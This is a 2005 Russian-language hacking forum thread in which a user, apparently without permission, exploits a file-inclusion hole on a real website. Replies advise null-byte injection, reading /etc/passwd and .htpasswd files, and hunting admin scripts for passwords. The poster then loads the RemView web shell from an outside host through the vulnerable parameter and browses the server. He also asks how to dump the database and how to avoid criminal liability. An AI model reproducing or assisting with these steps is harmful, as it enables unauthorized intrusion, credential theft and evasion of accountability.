Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Нашел небольшую дырочку на одном сайте, нужен совет (https://forum.antichat.xyz/showthread.php?t=8176)

paras1t3 19.07.2005 02:06

Нашел небольшую дырочку на одном сайте, нужен совет
 
отредактировал. Вдруг их адним тоже на античат вздумает зайти :)

KEZ 19.07.2005 02:16

Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE.
Тоесть чтобы экранировать .txt можно использовать %00
Во вторых, чтоже можно сделать чтением файлов?
Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =)

Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров.

Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.

tester2005 19.07.2005 02:32

Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу.

не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно..
Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.

paras1t3 19.07.2005 02:37

так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР,
Залил ремвью через форум, только незнаю в какой папке лежит.
+ там же файл переименовывается. Форум Инвижен 2.0 )

paras1t3 19.07.2005 02:44

ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ" :)

Народ, теперь такой вопросец:
я можно сказать - начинающий. и работаю даже не через проксю :) Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности. :)

paras1t3 19.07.2005 02:49

хех.. рано обрадовался:

ремвью запускаю так:

http://victim.com/index.php?a=http:/...men.ru/remview

запускается ремвью, но все ссылки в нем такого вида:
http://victim.com/index.php?&c=v&d=d...2F&f=about.txt

вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?

paras1t3 19.07.2005 02:50

в любом случае остается возможность запуска любого Мускульного кода.
Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?

paras1t3 19.07.2005 02:54

ой немогу :) нормально ремвью работает, просто нужно добавлять параметры так

http://victim.com/index.php?a=http:/...%2Fwww%2Fadmin

tester2005 19.07.2005 02:57

ну похвально, сам находишь ответы =)

paras1t3 19.07.2005 03:00

а по поводу моей анонимности, подскажите пожалуйста.

и по поводу просмотра структуры БД ;)


Время: 11:23